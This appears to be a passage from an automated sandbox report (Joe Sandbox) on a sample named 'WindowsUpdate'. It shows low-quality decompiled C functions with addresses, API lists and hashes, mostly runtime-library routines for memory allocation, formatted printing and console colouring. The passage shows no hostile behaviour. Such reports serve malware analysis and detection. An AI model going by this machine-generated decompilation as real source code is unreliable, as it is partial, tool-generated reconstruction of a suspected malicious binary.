										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t120 = _t120 + 0x10;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E0032C705())) = 0x16;
				goto L4;
			}




























                                                                                                                    0x0032950a
                                                                                                                    0x0032950d
                                                                                                                    0x00329513
                                                                                                                    0x00329516
                                                                                                                    0x00329519
                                                                                                                    0x00329536
                                                                                                                    0x00000000
                                                                                                                    0x00329536
                                                                                                                    0x0032951b
                                                                                                                    0x00329520
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00329524
                                                                                                                    0x0032953d
                                                                                                                    0x00329540
                                                                                                                    0x00329542
                                                                                                                    0x00329550
                                                                                                                    0x00329550
                                                                                                                    0x00329554
                                                                                                                    0x0032955c
                                                                                                                    0x00329561
                                                                                                                    0x00329561
                                                                                                                    0x00329564
                                                                                                                    0x00329566
                                                                                                                    0x00000000
                                                                                                                    0x00329568
                                                                                                                    0x00329568
                                                                                                                    0x00329570
                                                                                                                    0x00329572
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00329574
                                                                                                                    0x00329577
                                                                                                                    0x0032957a
                                                                                                                    0x00329581
                                                                                                                    0x00329583
                                                                                                                    0x0032958a
                                                                                                                    0x00329585
                                                                                                                    0x00329585
                                                                                                                    0x00329585
                                                                                                                    0x0032958f
                                                                                                                    0x00329592
                                                                                                                    0x00329594
                                                                                                                    0x0032967d
                                                                                                                    0x00000000
                                                                                                                    0x0032959a
                                                                                                                    0x0032959a
                                                                                                                    0x0032959a
                                                                                                                    0x003295a1
                                                                                                                    0x003295e2
                                                                                                                    0x003295e2
                                                                                                                    0x003295e4
                                                                                                                    0x0032964f
                                                                                                                    0x00329655
                                                                                                                    0x00329658
                                                                                                                    0x003296af
                                                                                                                    0x00000000
                                                                                                                    0x003296b5
                                                                                                                    0x0032965a
                                                                                                                    0x0032965d
                                                                                                                    0x0032965f
                                                                                                                    0x00329685
                                                                                                                    0x00329685
                                                                                                                    0x00329689
                                                                                                                    0x00329693
                                                                                                                    0x00329698
                                                                                                                    0x003296a0
                                                                                                                    0x00329531
                                                                                                                    0x00329531
                                                                                                                    0x00000000
                                                                                                                    0x00329531
                                                                                                                    0x00329661
                                                                                                                    0x00329664
                                                                                                                    0x00329667
                                                                                                                    0x00329668
                                                                                                                    0x00329668
                                                                                                                    0x00329669
                                                                                                                    0x0032966c
                                                                                                                    0x0032966f
                                                                                                                    0x00329672
                                                                                                                    0x00000000
                                                                                                                    0x00329672
                                                                                                                    0x003295e6
                                                                                                                    0x003295e8
                                                                                                                    0x0032960c
                                                                                                                    0x00329611
                                                                                                                    0x00329617
                                                                                                                    0x00329619
                                                                                                                    0x00329619
                                                                                                                    0x003295ea
                                                                                                                    0x003295ec
                                                                                                                    0x003295f2
                                                                                                                    0x00329604
                                                                                                                    0x00329604
                                                                                                                    0x00329604
                                                                                                                    0x00329606
                                                                                                                    0x003295f4
                                                                                                                    0x003295f9
                                                                                                                    0x003295fb
                                                                                                                    0x003295fb
                                                                                                                    0x00329608
                                                                                                                    0x00329608
                                                                                                                    0x0032961b
                                                                                                                    0x0032961e
                                                                                                                    0x00000000
                                                                                                                    0x00329620
                                                                                                                    0x00329620
                                                                                                                    0x00329621
                                                                                                                    0x0032962b
                                                                                                                    0x0032962c
                                                                                                                    0x00329631
                                                                                                                    0x00329634
                                                                                                                    0x00329636
                                                                                                                    0x003296bd
                                                                                                                    0x00000000
                                                                                                                    0x003296bd
                                                                                                                    0x0032963c
                                                                                                                    0x0032963f
                                                                                                                    0x003296ab
                                                                                                                    0x003296ab
                                                                                                                    0x003296ab
                                                                                                                    0x003296ab
                                                                                                                    0x00000000
                                                                                                                    0x003296ab
                                                                                                                    0x00329641
                                                                                                                    0x00329641
                                                                                                                    0x00329643
                                                                                                                    0x00329643
                                                                                                                    0x00329646
                                                                                                                    0x00329649
                                                                                                                    0x00000000
                                                                                                                    0x00329649
                                                                                                                    0x0032961e
                                                                                                                    0x003295a3
                                                                                                                    0x003295a6
                                                                                                                    0x003295a9
                                                                                                                    0x003295ab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003295ad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003295b3
                                                                                                                    0x003295b5
                                                                                                                    0x003295b7
                                                                                                                    0x003295b9
                                                                                                                    0x003295b9
                                                                                                                    0x003295bc
                                                                                                                    0x003295bf
                                                                                                                    0x003295c1
                                                                                                                    0x00000000
                                                                                                                    0x003295c7
                                                                                                                    0x003295ce
                                                                                                                    0x003295d3
                                                                                                                    0x003295d6
                                                                                                                    0x003295d9
                                                                                                                    0x003295dc
                                                                                                                    0x003295de
                                                                                                                    0x00000000
                                                                                                                    0x003295de
                                                                                                                    0x00329675
                                                                                                                    0x00329675
                                                                                                                    0x00329675
                                                                                                                    0x00000000
                                                                                                                    0x0032959a
                                                                                                                    0x00329594
                                                                                                                    0x00329566
                                                                                                                    0x00329549
                                                                                                                    0x0032954c
                                                                                                                    0x0032954e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0032954e
                                                                                                                    0x00329526
                                                                                                                    0x0032952b
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3877424927-0
                                                                                                                    • Opcode ID: 58f39add579991dad9ef1299213d9b84eb0245becf2f57f16a0bdcd36f41b157
                                                                                                                    • Instruction ID: e8530e41455d00798dff4ff0eede5e4f7260e0705e7b226482d058744a93f039
                                                                                                                    • Opcode Fuzzy Hash: 58f39add579991dad9ef1299213d9b84eb0245becf2f57f16a0bdcd36f41b157
                                                                                                                    • Instruction Fuzzy Hash: F351AF70B003269BDB278FB9A8807AEB7E5AF45330F25876AF825962D0D771DD508B44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002D0637 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E002D0637(void* __ebx, void* __edx, void* __edi, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v1032;
				char _v1036;
				char _v1040;
				void* __esi;
				intOrPtr* _t23;
				void* _t25;
				intOrPtr _t28;
				intOrPtr _t36;
				char* _t42;
				intOrPtr _t46;
				void* _t47;
				void* _t48;
				intOrPtr _t49;
				void* _t66;
				void* _t68;
				void* _t70;
				void* _t71;
				intOrPtr* _t72;
				signed int _t73;

				_t64 = __edx;
				_t45 = __ebx;
				_v8 =  *0x481f80 ^ _t73;
				_t23 = _a4;
				_t49 =  *_t23;
				_t72 = _a8;
				_v1036 = 0;
				_v1040 = 0;
				if(_t49 != 0) {
					_push(__edi);
					_push(0x400);
					_push( &_v1032);
					if(_t49 == 0x7e) {
						_push(_t23 + 1);
						_t25 = E002CB777();
						if(_t25 == 0) {
							goto L11;
						} else {
							_t17 = _t25 + 1; // 0x1
							_t67 = _t17;
							_t28 = E00327BCE(__ebx, _t17, _t17);
							 *_t72 = _t28;
							if(_t28 != 0) {
								E00327AF9(_t28, _t67,  &_v1032);
								_pop(_t68);
								return E003272F2(1, __ebx, _v8 ^ _t73, _t64, _t68, _t72);
							} else {
								goto L11;
							}
						}
					} else {
						_push(_t23);
						if(E002CB777() == 0 || E002D1067( &_v1032, _t32,  &_v1040,  &_v1036) == 0) {
							L11:
							_pop(_t66);
							return E003272F2(0, _t45, _v8 ^ _t73, _t64, _t66, _t72);
						} else {
							_t69 = _v1040;
							if(_v1040 == 0) {
								goto L11;
							} else {
								_push(__ebx);
								_t46 = _v1036;
								_t13 = _t46 + 1; // 0x1
								_t36 = E00327BCE(_t46, _t69, _t13);
								 *_t72 = _t36;
								if(_t36 != 0) {
									E00327337(_t36, _t69, _t46);
									 *((char*)(_t46 +  *_t72)) = 0;
									_pop(_t47);
									_pop(_t70);
									return E003272F2(1, _t47, _v8 ^ _t73, _t64, _t70, _t72);
								} else {
									_pop(_t48);
									_pop(_t71);
									return E003272F2(_t36, _t48, _v8 ^ _t73, _t64, _t71, _t72);
								}
							}
						}
					}
				} else {
					_t42 = E00327BCE(__ebx, __edi, 1);
					 *_t72 = _t42;
					 *_t42 = 0;
					return E003272F2(1, __ebx, _v8 ^ _t73, __edx, __edi, _t72);
				}
			}























                                                                                                                    0x002d0637
                                                                                                                    0x002d0637
                                                                                                                    0x002d0647
                                                                                                                    0x002d064a
                                                                                                                    0x002d064e
                                                                                                                    0x002d0650
                                                                                                                    0x002d0653
                                                                                                                    0x002d065d
                                                                                                                    0x002d0669
                                                                                                                    0x002d068e
                                                                                                                    0x002d0692
                                                                                                                    0x002d069d
                                                                                                                    0x002d069e
                                                                                                                    0x002d0733
                                                                                                                    0x002d0734
                                                                                                                    0x002d073e
                                                                                                                    0x00000000
                                                                                                                    0x002d0740
                                                                                                                    0x002d0740
                                                                                                                    0x002d0740
                                                                                                                    0x002d0744
                                                                                                                    0x002d074c
                                                                                                                    0x002d0750
                                                                                                                    0x002d076d
                                                                                                                    0x002d077a
                                                                                                                    0x002d0789
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002d0750
                                                                                                                    0x002d06a4
                                                                                                                    0x002d06a4
                                                                                                                    0x002d06af
                                                                                                                    0x002d0752
                                                                                                                    0x002d0752
                                                                                                                    0x002d0763
                                                                                                                    0x002d06d7
                                                                                                                    0x002d06d7
                                                                                                                    0x002d06df
                                                                                                                    0x00000000
                                                                                                                    0x002d06e1
                                                                                                                    0x002d06e1
                                                                                                                    0x002d06e2
                                                                                                                    0x002d06e8
                                                                                                                    0x002d06ec
                                                                                                                    0x002d06f4
                                                                                                                    0x002d06f8
                                                                                                                    0x002d070e
                                                                                                                    0x002d0718
                                                                                                                    0x002d071c
                                                                                                                    0x002d071d
                                                                                                                    0x002d0731
                                                                                                                    0x002d06fa
                                                                                                                    0x002d06fa
                                                                                                                    0x002d06fb
                                                                                                                    0x002d070a
                                                                                                                    0x002d070a
                                                                                                                    0x002d06f8
                                                                                                                    0x002d06df
                                                                                                                    0x002d06af
                                                                                                                    0x002d066b
                                                                                                                    0x002d066d
                                                                                                                    0x002d0672
                                                                                                                    0x002d0677
                                                                                                                    0x002d068d
                                                                                                                    0x002d068d

                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 002D066D
                                                                                                                      • Part of subcall function 00327BCE: __FF_MSGBANNER.LIBCMT ref: 00327BE5
                                                                                                                      • Part of subcall function 00327BCE: __NMSG_WRITE.LIBCMT ref: 00327BEC
                                                                                                                    • _malloc.LIBCMT ref: 002D06EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1579825452-0
                                                                                                                    • Opcode ID: 1d39e5989a297ab83a30d9f49a44099e95956c0efd58856c6507a816c9dd62df
                                                                                                                    • Instruction ID: 73484fb6781589b19c8045938dd0b688f6de5d40d85d797ba004e28ee49c5da0
                                                                                                                    • Opcode Fuzzy Hash: 1d39e5989a297ab83a30d9f49a44099e95956c0efd58856c6507a816c9dd62df
                                                                                                                    • Instruction Fuzzy Hash: 833100B1A101199BDB11DF68DC81BEEB3ACEF55300F0001AEFE499F241EA359D56CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034E0EC Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 43%
                                                                                                                    			E0034E0EC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				long _v1032;
				char _v1036;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				signed short* _v1052;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t27;
				signed short** _t31;
				wchar_t* _t40;
				void* _t45;
				void* _t51;
				intOrPtr _t52;
				void* _t53;
				signed int _t54;
				void* _t55;
				void* _t57;

				_v8 =  *0x482960 ^ _t54;
				_t52 = _a4;
				_v1048 = _a8;
				_v1044 = _a12;
				_t26 = E003AC711(_a12, _a16, 0x4742f5);
				_push(0);
				_push(_t52);
				L003ABD44();
				_t45 = _t26;
				_t27 = E003ACD57(_t45, _t52, _t45);
				_t53 = _t27;
				_t57 = _t55 + 0x10;
				if(_t53 == 0) {
					L3:
					return E003ABE87(0, _t45, _v8 ^ _t54, _t51, _t52, _t53);
				} else {
					_push(_t53);
					_push(_t45);
					_push(0);
					_push(_t52);
					L003ABD4A();
					if(_t27 != 0) {
						_push( &_v1036);
						_t31 =  &_v1052;
						_push(_t31);
						_push(0x4742f8);
						_push(_t53);
						L003ABD50();
						if(_t31 == 0) {
							goto L2;
						} else {
							swprintf( &_v1032, 0x400, 0x474314,  *_v1052 & 0x0000ffff, _v1052[1] & 0x0000ffff, _v1048);
							_t57 = _t57 + 0x18;
							_push( &_v1036);
							_push( &_v1040);
							_t40 =  &_v1032;
							_push(_t40);
							_push(_t53);
							L003ABD50();
							if(_t40 == 0) {
								goto L2;
							} else {
								E003AC711(_v1044, _a16, _v1040);
								E003ACD1F(_t53);
								return E003ABE87(1, _t45, _v8 ^ _t54, _t51, _t52, _t53);
							}
						}
					} else {
						L2:
						 *0x47412c();
						E003ACD1F(_t53);
						goto L3;
					}
				}
			}
























                                                                                                                    0x0034e0fc
                                                                                                                    0x0034e105
                                                                                                                    0x0034e110
                                                                                                                    0x0034e11a
                                                                                                                    0x0034e120
                                                                                                                    0x0034e128
                                                                                                                    0x0034e12a
                                                                                                                    0x0034e12b
                                                                                                                    0x0034e130
                                                                                                                    0x0034e133
                                                                                                                    0x0034e138
                                                                                                                    0x0034e13a
                                                                                                                    0x0034e13f
                                                                                                                    0x0034e160
                                                                                                                    0x0034e170
                                                                                                                    0x0034e141
                                                                                                                    0x0034e141
                                                                                                                    0x0034e142
                                                                                                                    0x0034e143
                                                                                                                    0x0034e145
                                                                                                                    0x0034e146
                                                                                                                    0x0034e14d
                                                                                                                    0x0034e177
                                                                                                                    0x0034e178
                                                                                                                    0x0034e17e
                                                                                                                    0x0034e17f
                                                                                                                    0x0034e184
                                                                                                                    0x0034e185
                                                                                                                    0x0034e18c
                                                                                                                    0x00000000
                                                                                                                    0x0034e18e
                                                                                                                    0x0034e1b4
                                                                                                                    0x0034e1b9
                                                                                                                    0x0034e1c2
                                                                                                                    0x0034e1c9
                                                                                                                    0x0034e1ca
                                                                                                                    0x0034e1d0
                                                                                                                    0x0034e1d1
                                                                                                                    0x0034e1d2
                                                                                                                    0x0034e1d9
                                                                                                                    0x00000000
                                                                                                                    0x0034e1df
                                                                                                                    0x0034e1ee
                                                                                                                    0x0034e1f4
                                                                                                                    0x0034e211
                                                                                                                    0x0034e211
                                                                                                                    0x0034e1d9
                                                                                                                    0x0034e14f
                                                                                                                    0x0034e14f
                                                                                                                    0x0034e14f
                                                                                                                    0x0034e156
                                                                                                                    0x00000000
                                                                                                                    0x0034e15b
                                                                                                                    0x0034e14d

                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 0034E133
                                                                                                                      • Part of subcall function 003ACD57: __FF_MSGBANNER.LIBCMT ref: 003ACD6E
                                                                                                                      • Part of subcall function 003ACD57: __NMSG_WRITE.LIBCMT ref: 003ACD75
                                                                                                                    • _free.LIBCMT ref: 0034E156
                                                                                                                    • swprintf.LIBCMT ref: 0034E1B4
                                                                                                                    • _free.LIBCMT ref: 0034E1F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_mallocswprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 977208848-0
                                                                                                                    • Opcode ID: d6b6ee1db0460668af34d651dc04538c6f312164209d917a8e2ab7af3dd59f59
                                                                                                                    • Instruction ID: 365f65ae8c675949ad164156fb20857da26eba30226f99b8823dc8ae6ee0fa4c
                                                                                                                    • Opcode Fuzzy Hash: d6b6ee1db0460668af34d651dc04538c6f312164209d917a8e2ab7af3dd59f59
                                                                                                                    • Instruction Fuzzy Hash: 6F318BB2A0011C6BDB11AF64DD41FEEB7ACEF45300F1000B5FB08EA142EB359E958BA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003293FA Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E003293FA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t47;
				void* _t48;
				intOrPtr _t54;
				signed int _t60;
				void* _t61;
				intOrPtr _t65;
				void* _t68;

				_push(0x10);
				_push(0x47dac8);
				E0032EC57(__ebx, __edi, __esi);
				if((0 |  *((intOrPtr*)(_t68 + 8)) != 0x00000000) != 0) {
					_t65 =  *((intOrPtr*)(_t68 + 0xc));
					_t65 = _t65 != 0;
					if(_t65 != 0) {
						goto L1;
					} else {
						__eflags =  *(_t65 + 0xc) & 0x00000040;
						if(( *(_t65 + 0xc) & 0x00000040) != 0) {
							L14:
							_t54 = E0032FF27( *((intOrPtr*)(_t68 + 8)));
							 *((intOrPtr*)(_t68 - 0x1c)) = _t54;
							E0032EFE7(_t65);
							 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
							_t41 = E0032EE7D(_t54, __eflags, _t65);
							 *((intOrPtr*)(_t68 - 0x20)) = E0032FDC8( *((intOrPtr*)(_t68 + 8)), 1, _t54, _t65);
							E0032EE4C(_t41, _t65);
							 *(_t68 - 4) = 0xfffffffe;
							E003294F8(_t65);
							__eflags =  *((intOrPtr*)(_t68 - 0x20)) - _t54;
							_t37 = (__eflags == 0) - 1;
							__eflags = (__eflags == 0) - 1;
						} else {
							_t47 = E0032EF23(_t65);
							_t60 = _t47;
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L7:
								_t48 = 0x482cc0;
							} else {
								__eflags = _t60 - 0xfffffffe;
								if(_t60 == 0xfffffffe) {
									goto L7;
								} else {
									_t48 = ((_t47 & 0x0000001f) << 6) +  *((intOrPtr*)(0x487f50 + (_t60 >> 5) * 4));
								}
							}
							__eflags =  *(_t48 + 0x24) & 0x0000007f;
							if(( *(_t48 + 0x24) & 0x0000007f) != 0) {
								goto L1;
							} else {
								__eflags = _t60 - 0xffffffff;
								if(_t60 == 0xffffffff) {
									L12:
									_t61 = 0x482cc0;
								} else {
									__eflags = _t60 - 0xfffffffe;
									if(_t60 == 0xfffffffe) {
										goto L12;
									} else {
										_t61 = ((_t60 & 0x0000001f) << 6) +  *((intOrPtr*)(0x487f50 + (_t60 >> 5) * 4));
									}
								}
								__eflags =  *(_t61 + 0x24) & 0x00000080;
								if(( *(_t61 + 0x24) & 0x00000080) != 0) {
									goto L1;
								} else {
									goto L14;
								}
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E0032C705())) = 0x16;
					_t37 = E0032C696() | 0xffffffff;
				}
				return E0032EC9C(_t37);
			}











                                                                                                                    0x003293fa
                                                                                                                    0x003293fc
                                                                                                                    0x00329401
                                                                                                                    0x00329410
                                                                                                                    0x0032942c
                                                                                                                    0x00329434
                                                                                                                    0x00329436
                                                                                                                    0x00000000
                                                                                                                    0x00329438
                                                                                                                    0x00329438
                                                                                                                    0x0032943c
                                                                                                                    0x0032949d
                                                                                                                    0x003294a5
                                                                                                                    0x003294a7
                                                                                                                    0x003294ab
                                                                                                                    0x003294b2
                                                                                                                    0x003294b7
                                                                                                                    0x003294ca
                                                                                                                    0x003294cf
                                                                                                                    0x003294d7
                                                                                                                    0x003294de
                                                                                                                    0x003294e5
                                                                                                                    0x003294eb
                                                                                                                    0x003294eb
                                                                                                                    0x0032943e
                                                                                                                    0x0032943f
                                                                                                                    0x00329445
                                                                                                                    0x00329447
                                                                                                                    0x0032944a
                                                                                                                    0x00329465
                                                                                                                    0x00329465
                                                                                                                    0x0032944c
                                                                                                                    0x0032944c
                                                                                                                    0x0032944f
                                                                                                                    0x00000000
                                                                                                                    0x00329451
                                                                                                                    0x0032945c
                                                                                                                    0x0032945c
                                                                                                                    0x0032944f
                                                                                                                    0x0032946a
                                                                                                                    0x0032946e
                                                                                                                    0x00000000
                                                                                                                    0x00329470
                                                                                                                    0x00329470
                                                                                                                    0x00329473
                                                                                                                    0x0032948e
                                                                                                                    0x0032948e
                                                                                                                    0x00329475
                                                                                                                    0x00329475
                                                                                                                    0x00329478
                                                                                                                    0x00000000
                                                                                                                    0x0032947a
                                                                                                                    0x00329485
                                                                                                                    0x00329485
                                                                                                                    0x00329478
                                                                                                                    0x00329493
                                                                                                                    0x00329497
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00329497
                                                                                                                    0x0032946e
                                                                                                                    0x0032943c
                                                                                                                    0x00329412
                                                                                                                    0x00329412
                                                                                                                    0x00329417
                                                                                                                    0x00329422
                                                                                                                    0x00329422
                                                                                                                    0x003294f1

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __ftbuf__getptd_noexit__lock_file__stbuf_strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 583463211-0
                                                                                                                    • Opcode ID: 09c5d80d8fcb19464d5a52424c282238ab65492efece285c179610394c12f1a9
                                                                                                                    • Instruction ID: 53edce868862e8bfb6d2886d5492c85954f297b4ccd31a53f8ed61e11ab13ab9
                                                                                                                    • Opcode Fuzzy Hash: 09c5d80d8fcb19464d5a52424c282238ab65492efece285c179610394c12f1a9
                                                                                                                    • Instruction Fuzzy Hash: 1D212871A142245AEB12BA36BD0276D3565AFC2330F2A873AF8348E1D1DB78DD439614
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0035323C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 23%
                                                                                                                    			E0035323C() {
				signed int _v8;
				signed short _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t14;
				void* _t17;
				intOrPtr* _t20;
				void* _t24;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t28;

				_v8 =  *0x482960 ^ _t28;
				_t20 =  *0x474044;
				_t7 =  *_t20(0xfffffff5);
				_t8 =  *0x474074(_t7,  &_v32);
				_t25 = _v24 & 0x0000ffff;
				_t32 = _t8;
				if(_t8 == 0) {
					_t25 = 0xf;
				}
				_t9 =  *_t20(0xfffffff5);
				_t27 =  *0x474078;
				 *_t27(_t9, 0xf);
				E003ADF32(_t25, _t27, _t32);
				E003ADF32(_t25, _t27, _t32);
				E003ADF32(_t25, _t27, _t32);
				_t14 =  *_t20(0xfffffff5, 0x474500, 0x4744cc, 0x4744ac, 0x474498, 0x474494, 0x474450);
				 *_t27(_t14, 0xf);
				E003ADF32(_t25, _t27, _t32);
				_t17 =  *_t20(0xfffffff5, 0x474450);
				return E003ABE87( *_t27(_t25 | 0x00000008), _t20, _v8 ^ _t28, _t24, _t25 | 0x00000008, _t27, _t17);
			}




















                                                                                                                    0x00353249
                                                                                                                    0x0035324d
                                                                                                                    0x00353257
                                                                                                                    0x0035325e
                                                                                                                    0x00353264
                                                                                                                    0x00353268
                                                                                                                    0x0035326a
                                                                                                                    0x0035326c
                                                                                                                    0x0035326c
                                                                                                                    0x00353273
                                                                                                                    0x00353275
                                                                                                                    0x0035327e
                                                                                                                    0x00353285
                                                                                                                    0x00353299
                                                                                                                    0x003532a8
                                                                                                                    0x003532b2
                                                                                                                    0x003532b7
                                                                                                                    0x003532be
                                                                                                                    0x003532c8
                                                                                                                    0x003532e1

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738768116-0
                                                                                                                    • Opcode ID: d544947f804929882c05d4acd3def1f6b24267c74fa83daaa730368f6ebb61d7
                                                                                                                    • Instruction ID: cd210802ed1fd9a813e840f0654e905345e436baa6571b7e9edf3ebdfdb1dfa6
                                                                                                                    • Opcode Fuzzy Hash: d544947f804929882c05d4acd3def1f6b24267c74fa83daaa730368f6ebb61d7
                                                                                                                    • Instruction Fuzzy Hash: D501FE52B8020476C910B7F55C46FBF765CDB91B20F214316B63D635C2DB6454005675
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CF2D7 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 23%
                                                                                                                    			E002CF2D7() {
				signed int _v8;
				signed short _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t14;
				void* _t17;
				intOrPtr* _t20;
				void* _t24;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t28;

				_v8 =  *0x481f80 ^ _t28;
				_t20 =  *0x470104;
				_t7 =  *_t20(0xfffffff5);
				_t8 =  *0x47004c(_t7,  &_v32);
				_t25 = _v24 & 0x0000ffff;
				_t32 = _t8;
				if(_t8 == 0) {
					_t25 = 0xf;
				}
				_t9 =  *_t20(0xfffffff5);
				_t27 =  *0x470050;
				 *_t27(_t9, 0xf);
				E00329C53(_t20, _t25, _t27, _t32);
				E00329C53(_t20, _t25, _t27, _t32);
				E00329C53(_t20, _t25, _t27, _t32);
				_t14 =  *_t20(0xfffffff5, 0x4703d0, 0x470398, 0x470378, 0x470360, 0x47035c, 0x470318);
				 *_t27(_t14, 0xf);
				E00329C53(_t20, _t25, _t27, _t32);
				_t17 =  *_t20(0xfffffff5, 0x470318);
				return E003272F2( *_t27(_t25 | 0x00000008), _t20, _v8 ^ _t28, _t24, _t25 | 0x00000008, _t27, _t17);
			}




















                                                                                                                    0x002cf2e4
                                                                                                                    0x002cf2e8
                                                                                                                    0x002cf2f2
                                                                                                                    0x002cf2f9
                                                                                                                    0x002cf2ff
                                                                                                                    0x002cf303
                                                                                                                    0x002cf305
                                                                                                                    0x002cf307
                                                                                                                    0x002cf307
                                                                                                                    0x002cf30e
                                                                                                                    0x002cf310
                                                                                                                    0x002cf319
                                                                                                                    0x002cf320
                                                                                                                    0x002cf334
                                                                                                                    0x002cf343
                                                                                                                    0x002cf34d
                                                                                                                    0x002cf352
                                                                                                                    0x002cf359
                                                                                                                    0x002cf363
                                                                                                                    0x002cf37c

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
